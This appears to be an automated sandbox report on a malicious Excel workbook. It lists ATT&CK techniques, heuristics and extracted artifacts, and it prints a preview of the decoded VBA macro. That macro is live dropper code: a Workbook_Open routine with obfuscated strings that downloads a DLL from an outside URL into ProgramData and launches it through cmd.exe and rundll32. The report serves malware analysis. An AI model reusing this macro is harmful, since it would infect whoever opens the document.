MALICIOUS
Risk Score: 100
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an Excel document containing a Workbook_Open VBA macro, which is a common technique for executing malicious code upon opening. The VBA code is heavily obfuscated but appears to construct a URL, 'https://outdoortacklebox.com/1.dll', likely to download a second-stage payload. It also attempts to write to startup directories, suggesting an attempt at persistence. The presence of a Workbook_Open macro and the obfuscated code strongly indicate malicious intent, likely delivered via spearphishing.
Heuristics 3
- VBA project inside OOXML (severity: medium, 2 related findings). Rule OOXML_VBA: Document contains a VBA project — VBA macros present
- Workbook_Open macro (severity: high). Rule OLE_VBA_WBOPEN: Workbook_Open macro
- VBA p-code auto-exec with execution tokens (severity: high). Rule OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 50656 bytes |

SHA-256: 296a3896a5604ce6cc0b0977a6ded255e378bb83b8ab84bb1e0a060eb4896362

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub chk2wj3k()
With Application.CommandBars(1).Controls.Add(Type:=msoControlPopup, Temporary:=True)
.Caption = "?????"
With .Controls
With .Add(Type:=msoControlButton)
.FaceId = 280
.Caption = "????????"
.OnAction = "??????1"
End With
With .Add(Type:=msoControlPopup)
.Caption = "???? ??????"
With .Controls
With .Add(Type:=msoControlButton)
.FaceId = 1643
.Caption = "??????????"
.OnAction = "??????2"
End With
With .Add(Type:=msoControlButton)
.FaceId = 1000
.Caption = "??????????"
.OnAction = "??????3"
End With
End With
End With
End With
End With
End Sub
Public Sub nvlk5lk()
Dim fojn As Long
UserForm1.Label1.Caption = "ht"
UserForm1.OptionButton1.Caption = UserForm1.Label1.Caption + "tps:/"
UserForm1.OptionButton2.Caption = UserForm1.OptionButton1.Caption + "/outdo"
UserForm1.OptionButton2.Tag = UserForm1.OptionButton2.Caption + "ortacklebox.c"
UserForm1.Label1.Caption = UserForm1.OptionButton2.Tag + "om/1.d"
UserForm1.Label1.Caption = UserForm1.Label1.Caption + "ll"
UserForm1.OptionButton1.Caption = "C"
UserForm1.OptionButton2.Caption = UserForm1.OptionButton1.Caption + ":\Pro"
UserForm1.OptionButton2.Tag = UserForm1.OptionButton2.Caption + "gramD"
UserForm1.Label1.Tag = UserForm1.OptionButton2.Tag + "ata\ryui2.d"
UserForm1.OptionButton3.Caption = UserForm1.Label1.Tag + "ll"
fojn = uro2ihol.gfwer23(0, UserForm1.Label1.Caption, UserForm1.OptionButton3.Caption, 0, 0)
If fojn = 0 Then
UserForm1.OptionButton3.Caption = "Cxava:xava\Wxavaindoxavaws\xavaSyxavastxavaemxava3xava2\xavacmxavad.exxavae"
UserForm1.OptionButton3.Caption = uro2ihol.jgflk4(UserForm1.OptionButton3.Caption, "xava")
UserForm1.OptionButton3.Tag = "/betuc chobetuicbetue /betuC Y /betuN /D Ybetu /T 3betu0 & stabeturt Cbetu:\Wbetuinbetudobetuws\betuSbetuysbetutbetuem3betu2\rbetuundbetullbetu3betu2.betuexbetue Cbetu:\betuProbetugrabetumDbetuatbetua\beturbetutewbetudbetu.dbetull,DbetulbetulRebetugibetustbetuerSbetuerbetuvebetur"
UserForm1.OptionButton3.Tag = uro2ihol.jgflk4(UserForm1.OptionButton3.Tag, "betu")
uro2ihol.adfeq346w45 UserForm1.OptionButton3.Caption, UserForm1.OptionButton3.Tag
End If
End Sub
Private Sub Workbook_Open()
Dim x, y, z As Double
Dim hnfkj As String
nvlk5lk
hnfkj = UserForm1.OptionButton3.Caption
End Sub
Sub sdfml2342pol3(fewo4ih As String, jgdlfk As String)
fewo4ih = fewo4ih + " "
fewo4ih = fewo4ih + jgdlfk
End Sub
With MenuBars("Worksheet").Menus.Add(Caption:="?????")
.MenuItems.Add Caption:="????????", OnAction:="??????1"
With .MenuItems.AddMenu(Caption:="???? ??????")
.MenuItems.Add Caption:="??????????", OnAction:="??????2"
.MenuItems.Add Caption:="??????????", OnAction:="??????3"
End With
End With
End Sub
Sub ito3uhi4uh()
With MenuBars("Worksheet").Menus.Add(Caption:="?????")
.MenuItems.Add Caption:="????????", OnAction:="??????1"
With .MenuItems.AddMenu(Caption:="???? ??????")
With .MenuItems.Add(Caption:="??????????")
.OnAction = "??????2"
End With
With .MenuItems.Add(Caption:="??????????")
.OnAction = "??????3"
End With
End With
End With
End Sub
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_G
... (truncated)

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 147968 bytes |

SHA-256: ab1c1f554d29b2fc9cbb0a6677d75d8a9d940aae91d988c19563f01d04149779